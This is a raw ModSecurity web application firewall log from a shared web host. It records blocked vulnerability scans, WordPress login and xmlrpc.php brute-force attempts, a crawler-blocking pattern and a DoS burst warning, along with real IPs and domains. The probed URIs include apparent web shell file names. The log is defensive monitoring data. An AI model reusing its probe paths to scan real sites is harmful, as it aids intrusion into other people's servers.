[Tue May 26 19:25:53.535308 2026] [security2:error] [pid 49598:tid 49771] [client 114.119.133.83:56557] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.xllent.in"] [uri "/discountsalepage292e211ghu335753.php"] [unique_id "ahWmaezJzkdc0WtdrwtKAgAAALA"], referer: http://www.xllent.in/discountsalepage292e211ghu335753.php?id=cherokee-workwear-scrubs-unisex-vneck-tunic-top-p-11536.html
[Tue May 26 19:25:53.647856 2026] [security2:error] [pid 49598:tid 49763] [client 20.192.3.167:4196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/asus.php"] [unique_id "ahWmaezJzkdc0WtdrwtKBgAAAKg"]
[Tue May 26 19:25:54.229472 2026] [security2:error] [pid 49598:tid 49669] [remote 148.66.130.53:47588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.130.66.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWmauzJzkdc0WtdrwtKGQAAjUY"]
[Tue May 26 19:25:54.574619 2026] [security2:error] [pid 49598:tid 49764] [client 20.192.3.167:11126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/about.php"] [unique_id "ahWmauzJzkdc0WtdrwtKKAAAAKk"]
[Tue May 26 19:25:55.526374 2026] [security2:error] [pid 49598:tid 49771] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWma-zJzkdc0WtdrwtKPwAAALA"]
[Tue May 26 19:25:55.613306 2026] [security2:error] [pid 49598:tid 49845] [client 20.192.3.167:11265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/atomlib.php"] [unique_id "ahWma-zJzkdc0WtdrwtKTAAAAPo"]
[Tue May 26 19:25:56.610581 2026] [security2:error] [pid 49598:tid 49772] [client 20.192.3.167:12781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/alfa-rex.php7"] [unique_id "ahWmbOzJzkdc0WtdrwtKagAAALE"]
[Tue May 26 19:25:56.894608 2026] [security2:error] [pid 49598:tid 49666] [remote 148.66.130.53:47588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.130.66.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWmbOzJzkdc0WtdrwtKcwAAz0M"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:25:57.569677 2026] [security2:error] [pid 49598:tid 49781] [client 20.192.3.167:14720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/b.php"] [unique_id "ahWmbezJzkdc0WtdrwtKkQAAALo"]
[Tue May 26 19:25:57.850561 2026] [security2:error] [pid 49598:tid 49739] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmbezJzkdc0WtdrwtKjwAAAJA"]
[Tue May 26 19:25:58.016997 2026] [security2:error] [pid 49598:tid 49692] [remote 168.63.79.147:57324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmbezJzkdc0WtdrwtKoQAAvV0"]
[Tue May 26 19:25:58.629205 2026] [security2:error] [pid 49598:tid 49852] [client 20.192.3.167:6123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/buy.php"] [unique_id "ahWmbuzJzkdc0WtdrwtKugAAAQE"]
[Tue May 26 19:25:59.142651 2026] [security2:error] [pid 49598:tid 49834] [client 91.245.236.124:56947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmb-zJzkdc0WtdrwtKxQAAAO8"]
[Tue May 26 19:25:59.556467 2026] [security2:error] [pid 49598:tid 49733] [client 20.192.3.167:7711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/bless.php"] [unique_id "ahWmb-zJzkdc0WtdrwtK1gAAAIo"]
[Tue May 26 19:25:59.692635 2026] [security2:error] [pid 49598:tid 49690] [remote 168.63.79.147:57324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmb-zJzkdc0WtdrwtK2gAA4ls"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:25:59.993263 2026] [security2:error] [pid 49598:tid 49826] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmb-zJzkdc0WtdrwtK1QAAAOc"]
[Tue May 26 19:25:59.996133 2026] [security2:error] [pid 49598:tid 49831] [client 91.245.236.124:63999] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmb-zJzkdc0WtdrwtK3wAAAOw"]
[Tue May 26 19:26:00.842217 2026] [security2:error] [pid 49598:tid 49852] [client 91.245.236.124:40167] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmcOzJzkdc0WtdrwtK7gAAAQE"]
[Tue May 26 19:26:00.879142 2026] [security2:error] [pid 49598:tid 49746] [client 188.130.142.83:36145] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWmcOzJzkdc0WtdrwtK7AAAAJc"], referer: http://agsnails.com/fresh-snails/
[Tue May 26 19:26:01.179874 2026] [security2:error] [pid 49598:tid 49746] [client 188.130.142.83:36145] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "200"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWmcOzJzkdc0WtdrwtK7AAAAJc"], referer: http://agsnails.com/fresh-snails/
[Tue May 26 19:26:01.676842 2026] [security2:error] [pid 49598:tid 49729] [client 91.245.236.124:38919] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmcezJzkdc0WtdrwtLFwAAAIY"]
[Tue May 26 19:26:01.939484 2026] [security2:error] [pid 49598:tid 49772] [client 20.192.3.167:10544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/class-t.api.php"] [unique_id "ahWmcezJzkdc0WtdrwtLIAAAALE"]
[Tue May 26 19:26:02.334633 2026] [security2:error] [pid 49598:tid 49826] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmcezJzkdc0WtdrwtLHAAAAOc"]
[Tue May 26 19:26:02.506780 2026] [security2:error] [pid 49598:tid 49737] [client 91.245.236.124:14957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmcuzJzkdc0WtdrwtLMAAAAI4"]
[Tue May 26 19:26:02.943169 2026] [security2:error] [pid 49598:tid 49698] [remote 165.22.95.96:54754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmcuzJzkdc0WtdrwtLNwAAjWM"]
[Tue May 26 19:26:03.011540 2026] [security2:error] [pid 49598:tid 49774] [client 20.192.3.167:11105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/cache.php"] [unique_id "ahWmc-zJzkdc0WtdrwtLQQAAALM"]
[Tue May 26 19:26:03.191095 2026] [security2:error] [pid 49598:tid 49810] [client 213.35.106.232:55092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-login.php"] [unique_id "ahWmc-zJzkdc0WtdrwtLSAAAANc"]
[Tue May 26 19:26:03.351494 2026] [security2:error] [pid 49598:tid 49746] [client 91.245.236.124:50933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmc-zJzkdc0WtdrwtLSgAAAJc"]
[Tue May 26 19:26:04.085324 2026] [security2:error] [pid 49598:tid 49773] [client 20.192.3.167:14329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/content.php"] [unique_id "ahWmdOzJzkdc0WtdrwtLYgAAALI"]
[Tue May 26 19:26:04.166300 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:30355] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmdOzJzkdc0WtdrwtLYwAAANo"]
[Tue May 26 19:26:04.668715 2026] [security2:error] [pid 49598:tid 49780] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmdOzJzkdc0WtdrwtLZgAAALk"]
[Tue May 26 19:26:05.000668 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:25545] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmdOzJzkdc0WtdrwtLiAAAAJ0"]
[Tue May 26 19:26:05.176098 2026] [security2:error] [pid 49598:tid 49742] [client 20.192.3.167:12746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/classwithtostring.php"] [unique_id "ahWmdezJzkdc0WtdrwtLkgAAAJM"]
[Tue May 26 19:26:05.491259 2026] [security2:error] [pid 49598:tid 49797] [client 213.35.106.232:55308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWmdezJzkdc0WtdrwtLmgAAAMo"]
[Tue May 26 19:26:05.777937 2026] [security2:error] [pid 49598:tid 49773] [client 91.245.236.124:46865] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmdezJzkdc0WtdrwtLqAAAALI"]
[Tue May 26 19:26:05.778044 2026] [security2:error] [pid 49598:tid 49773] [client 91.245.236.124:46865] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmdezJzkdc0WtdrwtLqAAAALI"]
[Tue May 26 19:26:06.161389 2026] [security2:error] [pid 49598:tid 49755] [client 20.192.3.167:11297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/css.php"] [unique_id "ahWmduzJzkdc0WtdrwtLuQAAAKA"]
[Tue May 26 19:26:06.539801 2026] [security2:error] [pid 49598:tid 49783] [client 91.245.236.124:21881] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmduzJzkdc0WtdrwtLvgAAALw"]
[Tue May 26 19:26:06.539928 2026] [security2:error] [pid 49598:tid 49783] [client 91.245.236.124:21881] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from  - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmduzJzkdc0WtdrwtLvgAAALw"]
[Tue May 26 19:26:06.539963 2026] [security2:error] [pid 49598:tid 49783] [client 91.245.236.124:21881] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmduzJzkdc0WtdrwtLvgAAALw"]
[Tue May 26 19:26:06.842869 2026] [security2:error] [pid 49598:tid 49834] [client 213.35.106.232:55705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahWmduzJzkdc0WtdrwtL1AAAAO8"]
[Tue May 26 19:26:06.903406 2026] [security2:error] [pid 49598:tid 49815] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmduzJzkdc0WtdrwtLvQAAANw"]
[Tue May 26 19:26:07.219262 2026] [security2:error] [pid 49598:tid 49808] [client 20.192.3.167:8668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/chosen.php"] [unique_id "ahWmd-zJzkdc0WtdrwtL3gAAANU"]
[Tue May 26 19:26:07.303881 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:63219] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmd-zJzkdc0WtdrwtL4gAAAN0"]
[Tue May 26 19:26:07.304002 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:63219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmd-zJzkdc0WtdrwtL4gAAAN0"]
[Tue May 26 19:26:07.914611 2026] [security2:error] [pid 49598:tid 49803] [client 213.35.106.232:55957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahWmd-zJzkdc0WtdrwtL_AAAANA"]
[Tue May 26 19:26:08.082453 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:41619] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeOzJzkdc0WtdrwtMBgAAAOI"]
[Tue May 26 19:26:08.082639 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:41619] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeOzJzkdc0WtdrwtMBgAAAOI"]
[Tue May 26 19:26:08.174192 2026] [security2:error] [pid 49598:tid 49836] [client 20.192.3.167:11320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/doc.php"] [unique_id "ahWmeOzJzkdc0WtdrwtMCAAAAPE"]
[Tue May 26 19:26:08.544059 2026] [security2:error] [pid 49598:tid 49603] [remote 91.134.89.60:44264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWmeOzJzkdc0WtdrwtMEgAAugQ"]
[Tue May 26 19:26:08.856404 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:28889] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeOzJzkdc0WtdrwtMJQAAANQ"]
[Tue May 26 19:26:08.856544 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:28889] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeOzJzkdc0WtdrwtMJQAAANQ"]
[Tue May 26 19:26:09.030692 2026] [security2:error] [pid 49598:tid 49734] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmeOzJzkdc0WtdrwtMGAAAAIs"]
[Tue May 26 19:26:09.142586 2026] [security2:error] [pid 49598:tid 49811] [client 20.192.3.167:11619] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/elp.php"] [unique_id "ahWmeezJzkdc0WtdrwtMMQAAANg"]
[Tue May 26 19:26:09.641582 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:42219] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeezJzkdc0WtdrwtMRgAAAKE"]
[Tue May 26 19:26:09.641686 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:42219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeezJzkdc0WtdrwtMRgAAAKE"]
[Tue May 26 19:26:10.105996 2026] [security2:error] [pid 49598:tid 49835] [client 20.192.3.167:11599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/Exception-class.php"] [unique_id "ahWmeuzJzkdc0WtdrwtMYQAAAPA"]
[Tue May 26 19:26:10.422020 2026] [security2:error] [pid 49598:tid 49855] [client 91.245.236.124:27577] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeuzJzkdc0WtdrwtMbwAAAQQ"]
[Tue May 26 19:26:10.422128 2026] [security2:error] [pid 49598:tid 49855] [client 91.245.236.124:27577] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmeuzJzkdc0WtdrwtMbwAAAQQ"]
[Tue May 26 19:26:10.474547 2026] [security2:error] [pid 49598:tid 49774] [client 213.35.106.232:56176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-includes/version.php"] [unique_id "ahWmeuzJzkdc0WtdrwtMcgAAALM"]
[Tue May 26 19:26:11.081717 2026] [security2:error] [pid 49598:tid 49764] [client 20.192.3.167:3637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/ee.php"] [unique_id "ahWme-zJzkdc0WtdrwtMhwAAAKk"]
[Tue May 26 19:26:11.182494 2026] [security2:error] [pid 49598:tid 49787] [client 91.245.236.124:35829] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWme-zJzkdc0WtdrwtMkAAAAMA"]
[Tue May 26 19:26:11.182601 2026] [security2:error] [pid 49598:tid 49787] [client 91.245.236.124:35829] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWme-zJzkdc0WtdrwtMkAAAAMA"]
